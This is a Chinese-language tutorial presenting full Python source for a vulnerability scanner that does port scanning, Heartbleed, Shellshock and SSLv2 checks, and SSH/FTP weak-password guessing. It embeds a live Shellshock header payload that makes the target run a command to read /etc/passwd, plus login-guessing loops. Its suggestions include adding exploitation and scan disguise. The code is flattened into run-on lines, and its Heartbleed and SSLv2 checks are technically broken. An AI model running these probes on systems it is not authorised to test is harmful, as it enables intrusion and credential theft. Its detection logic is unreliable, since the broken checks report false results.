Python实例题:Python打造漏洞扫描器
目录
Python实例题
题目
代码实现
实现原理
模块化设计:
多线程扫描:
漏洞检测技术:
关键代码解析
端口扫描功能
Heartbleed 漏洞检测
Shellshock 漏洞检测
使用说明
安装依赖:
基本用法:
扫描常见端口:
扫描指定端口范围:
输出结果到文件:
扩展建议
增强功能:
性能优化:
用户界面:
安全增强:
Python实例题
题目
Python打造漏洞扫描器
代码实现
import socket
import requests
import threading
import time
import nmap
import argparse
import json
from urllib.parse import urlparse
import concurrent.futures
import reclass VulnerabilityScanner:def __init__(self):self.target = ""self.ports = []self.threads = 50self.timeout = 2self.vuln_db = self._load_vulnerability_database()self.results = {"target": "","scan_time": "","open_ports": [],"vulnerabilities": []}def _load_vulnerability_database(self):"""加载漏洞数据库"""vuln_db = {"heartbleed": {"name": "OpenSSL Heartbleed (CVE-2014-0160)","description": "OpenSSL 1.0.1至1.0.1f版本中存在的缓冲区溢出漏洞,允许攻击者读取内存内容。","port": 443,"protocol": "https","check_function": "check_heartbleed"},"shellshock": {"name": "Shellshock (CVE-2014-6271)","description": "Bash环境变量解析漏洞,允许远程执行代码。","port": 80,"protocol": "http","check_function": "check_shellshock"},"sslv2": {"name": "SSLv2支持检测","description": "服务器支持不安全的SSLv2协议,可能导致多种攻击。","port": 443,"protocol": "https","check_function": "check_sslv2"},"weak_password": {"name": "弱密码检测","description": "检测常见服务的弱密码","services": ["ssh", "ftp", "smtp", "telnet"],"check_function": "check_weak_password"}}return vuln_dbdef set_target(self, target):"""设置扫描目标"""self.target = targetself.results["target"] = targetdef set_ports(self, ports):"""设置扫描端口"""if isinstance(ports, int):self.ports = [ports]elif isinstance(ports, list):self.ports = portselif isinstance(ports, str):if '-' in ports:start, end = map(int, ports.split('-'))self.ports = list(range(start, end + 1))else:self.ports = [int(ports)]def set_threads(self, threads):"""设置扫描线程数"""self.threads = threadsdef set_timeout(self, timeout):"""设置连接超时时间"""self.timeout = timeoutdef scan_ports(self):"""扫描目标主机的开放端口"""print(f"[+] 开始扫描目标 {self.target} 的端口...")start_time = time.time()open_ports = []def scan_port(port):try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(self.timeout)result = sock.connect_ex((self.target, port))if result == 0:open_ports.append(port)service = socket.getservbyport(port) if port < 1024 else "unknown"print(f"[+] 端口 {port} 开放 ({service})")sock.close()except Exception as e:print(f"[-] 扫描端口 {port} 时出错: {e}")with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:executor.map(scan_port, self.ports)end_time = time.time()print(f"[+] 端口扫描完成,耗时 {end_time - start_time:.2f} 秒")print(f"[+] 共发现 {len(open_ports)} 个开放端口")self.results["open_ports"] = open_portsself.results["scan_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())return open_portsdef identify_services(self):"""识别开放端口上的服务"""print(f"[+] 开始识别 {self.target} 上的服务...")nm = nmap.PortScanner()for port in self.results["open_ports"]:try:nm.scan(self.target, str(port), arguments='-sV -Pn')if self.target in nm and port in nm[self.target]['tcp']:service_info = nm[self.target]['tcp'][port]service_name = service_info['name']service_version = service_info.get('version', 'unknown')print(f"[+] 端口 {port}: {service_name} ({service_version})")# 更新结果for port_info in self.results["open_ports"]:if port_info == port:self.results["open_ports"][self.results["open_ports"].index(port_info)] = {"port": port,"service": service_name,"version": service_version}except Exception as e:print(f"[-] 识别端口 {port} 服务时出错: {e}")def check_heartbleed(self, port=443):"""检测Heartbleed漏洞 (CVE-2014-0160)"""print(f"[+] 检测 {self.target}:{port} 是否存在Heartbleed漏洞...")try:# 简化版Heartbleed检测,实际应用中应使用更健壮的检测方法import sslcontext = ssl.create_default_context()context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEwith socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:# 发送特制的心跳包heartbleed_payload = bytearray([0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00])ssock.sendall(heartbleed_payload)response = ssock.recv(1024)# 简单判断:如果响应长度大于预期,则可能存在漏洞if len(response) > 7:print(f"[!] 警告: {self.target}:{port} 可能存在Heartbleed漏洞!")self.results["vulnerabilities"].append({"name": self.vuln_db["heartbleed"]["name"],"description": self.vuln_db["heartbleed"]["description"],"port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Heartbleed漏洞")except Exception as e:print(f"[-] 检测Heartbleed漏洞时出错: {e}")def check_shellshock(self, port=80):"""检测Shellshock漏洞 (CVE-2014-6271)"""print(f"[+] 检测 {self.target}:{port} 是否存在Shellshock漏洞...")try:url = f"http://{self.target}:{port}"headers = {"User-Agent": "() { :; }; echo; echo; /bin/cat /etc/passwd"}response = requests.get(url, headers=headers, timeout=self.timeout)# 检查响应中是否包含/etc/passwd内容if re.search(r'root:[x*]:0:0:', response.text):print(f"[!] 警告: {self.target}:{port} 可能存在Shellshock漏洞!")self.results["vulnerabilities"].append({"name": self.vuln_db["shellshock"]["name"],"description": self.vuln_db["shellshock"]["description"],"port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Shellshock漏洞")except Exception as e:print(f"[-] 检测Shellshock漏洞时出错: {e}")def check_sslv2(self, port=443):"""检测是否支持不安全的SSLv2协议"""print(f"[+] 检测 {self.target}:{port} 是否支持SSLv2...")try:import sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv2)context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEtry:with socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:print(f"[!] 警告: {self.target}:{port} 支持SSLv2协议!")self.results["vulnerabilities"].append({"name": self.vuln_db["sslv2"]["name"],"description": self.vuln_db["sslv2"]["description"],"port": port,"severity": "Medium"})except ssl.SSLError as e:if "protocol version" in str(e):print(f"[-] {self.target}:{port} 不支持SSLv2协议")else:print(f"[-] 检测SSLv2协议时出错: {e}")except Exception as e:print(f"[-] 检测SSLv2协议时出错: {e}")def check_weak_password(self, service, username="admin", password_list=["admin", "password", "123456"]):"""检测特定服务的弱密码"""print(f"[+] 检测 {self.target} 的 {service} 服务弱密码...")try:if service == "ssh":import paramikofor password in password_list:try:ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(self.target, username=username, password=password, timeout=self.timeout)print(f"[!] 警告: {self.target} 的SSH服务存在弱密码: {username}/{password}")self.results["vulnerabilities"].append({"name": f"{service}弱密码","description": f"发现{service}服务使用弱密码: {username}/{password}","service": service,"severity": "High"})ssh.close()breakexcept Exception as e:passelif service == "ftp":import ftplibfor password in password_list:try:ftp = ftplib.FTP(self.target)ftp.login(username, password)print(f"[!] 警告: {self.target} 的FTP服务存在弱密码: {username}/{password}")self.results["vulnerabilities"].append({"name": f"{service}弱密码","description": f"发现{service}服务使用弱密码: {username}/{password}","service": service,"severity": "High"})ftp.quit()breakexcept Exception as e:pass# 可以添加更多服务的弱密码检测except Exception as e:print(f"[-] 检测{service}弱密码时出错: {e}")def run_full_scan(self):"""运行完整扫描(端口扫描 + 服务识别 + 漏洞检测)"""print(f"[+] 开始对 {self.target} 进行完整扫描...")# 1. 端口扫描self.scan_ports()# 2. 服务识别self.identify_services()# 3. 漏洞检测for vuln_id, vuln_info in self.vuln_db.items():if vuln_id == "weak_password":# 弱密码检测需要特殊处理for service in vuln_info["services"]:for port_info in self.results["open_ports"]:if isinstance(port_info, dict) and port_info["service"] == service:self.check_weak_password(service)else:# 其他漏洞检测for port_info in self.results["open_ports"]:port = port_info["port"] if isinstance(port_info, dict) else port_infoif port == vuln_info["port"]:check_function = getattr(self, vuln_info["check_function"])check_function(port)# 4. 输出结果self.print_results()return self.resultsdef print_results(self):"""打印扫描结果"""print("\n" + "=" * 50)print(f"扫描结果: {self.target}")print("=" * 50)print("\n[+] 开放端口:")if not self.results["open_ports"]:print(" 未发现开放端口")else:for port_info in self.results["open_ports"]:if isinstance(port_info, dict):print(f" 端口 {port_info['port']}: {port_info['service']} ({port_info['version']})")else:print(f" 端口 {port_info}")print("\n[+] 发现的漏洞:")if not self.results["vulnerabilities"]:print(" 未发现漏洞")else:for vuln in self.results["vulnerabilities"]:print(f" - {vuln['name']} (端口: {vuln.get('port', 'N/A')}, 严重程度: {vuln['severity']})")print(f" {vuln['description']}")print("\n" + "=" * 50)def export_results(self, filename="scan_results.json"):"""导出扫描结果到JSON文件"""try:with open(filename, 'w') as f:json.dump(self.results, f, indent=4)print(f"[+] 扫描结果已导出到 {filename}")except Exception as e:print(f"[-] 导出结果时出错: {e}")def main():parser = argparse.ArgumentParser(description='Python漏洞扫描器')parser.add_argument('-t', '--target', help='目标主机IP或域名', required=True)parser.add_argument('-p', '--ports', help='扫描端口范围,如: 22,80,443 或 1-1000')parser.add_argument('-T', '--threads', help='线程数,默认50', type=int, default=50)parser.add_argument('-o', '--output', help='输出结果文件')args = parser.parse_args()scanner = VulnerabilityScanner()scanner.set_target(args.target)# 设置扫描端口if args.ports:if ',' in args.ports:ports = [int(p.strip()) for p in args.ports.split(',')]scanner.set_ports(ports)elif '-' in args.ports:start, end = map(int, args.ports.split('-'))scanner.set_ports(list(range(start, end + 1)))else:scanner.set_ports(int(args.ports))else:# 默认扫描常见端口common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 5432, 8080]scanner.set_ports(common_ports)# 设置线程数if args.threads:scanner.set_threads(args.threads)# 运行完整扫描results = scanner.run_full_scan()# 导出结果if args.output:scanner.export_results(args.output)if __name__ == "__main__":main()
实现原理
这个漏洞扫描器基于以下核心技术实现:
-
模块化设计:
- 分离端口扫描、服务识别和漏洞检测功能
- 支持多种漏洞检测模块
- 可扩展的漏洞数据库
-
多线程扫描:
- 使用线程池提高扫描效率
- 可配置的线程数和超时时间
-
漏洞检测技术:
- 协议特定检测(如 Heartbleed、SSLv2)
- 服务弱密码检测
- 基于 HTTP 头的漏洞检测(如 Shellshock)
关键代码解析
端口扫描功能
def scan_ports(self):print(f"[+] 开始扫描目标 {self.target} 的端口...")def scan_port(port):try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(self.timeout)result = sock.connect_ex((self.target, port))if result == 0:open_ports.append(port)service = socket.getservbyport(port) if port < 1024 else "unknown"print(f"[+] 端口 {port} 开放 ({service})")sock.close()except Exception as e:print(f"[-] 扫描端口 {port} 时出错: {e}")open_ports = []with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:executor.map(scan_port, self.ports)self.results["open_ports"] = open_portsreturn open_ports
Heartbleed 漏洞检测
def check_heartbleed(self, port=443):print(f"[+] 检测 {self.target}:{port} 是否存在Heartbleed漏洞...")try:import sslcontext = ssl.create_default_context()context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEwith socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:heartbleed_payload = bytearray([0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00])ssock.sendall(heartbleed_payload)response = ssock.recv(1024)if len(response) > 7:print(f"[!] 警告: {self.target}:{port} 可能存在Heartbleed漏洞!")self.results["vulnerabilities"].append({"name": "OpenSSL Heartbleed (CVE-2014-0160)","description": "OpenSSL 1.0.1至1.0.1f版本中存在的缓冲区溢出漏洞...","port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Heartbleed漏洞")except Exception as e:print(f"[-] 检测Heartbleed漏洞时出错: {e}")
Shellshock 漏洞检测
def check_shellshock(self, port=80):print(f"[+] 检测 {self.target}:{port} 是否存在Shellshock漏洞...")try:url = f"http://{self.target}:{port}"headers = {"User-Agent": "() { :; }; echo; echo; /bin/cat /etc/passwd"}response = requests.get(url, headers=headers, timeout=self.timeout)if re.search(r'root:[x*]:0:0:', response.text):print(f"[!] 警告: {self.target}:{port} 可能存在Shellshock漏洞!")self.results["vulnerabilities"].append({"name": "Shellshock (CVE-2014-6271)","description": "Bash环境变量解析漏洞,允许远程执行代码。","port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Shellshock漏洞")except Exception as e:print(f"[-] 检测Shellshock漏洞时出错: {e}")
使用说明
安装依赖:
pip install python-nmap requests
基本用法:
python vulnerability_scanner.py -t 192.168.1.100 -p 22,80,443
扫描常见端口:
python vulnerability_scanner.py -t example.com
扫描指定端口范围:
python vulnerability_scanner.py -t 192.168.1.1 -p 1-1000 -T 100
输出结果到文件:
python vulnerability_scanner.py -t target.com -o results.json
扩展建议
-
增强功能:
- 添加更多漏洞检测模块(SQL 注入、XSS 等)
- 实现漏洞利用功能(需要谨慎使用)
- 添加 CVE 数据库自动更新功能
-
性能优化:
- 使用异步 I/O 提高扫描效率
- 添加智能端口扫描策略
- 实现扫描结果缓存机制
-
用户界面:
- 开发 Web 界面
- 添加进度显示和扫描报告
- 支持批量扫描和任务管理
-
安全增强:
- 添加速率限制防止被防火墙拦截
- 实现扫描伪装技术
- 增加扫描结果加密功能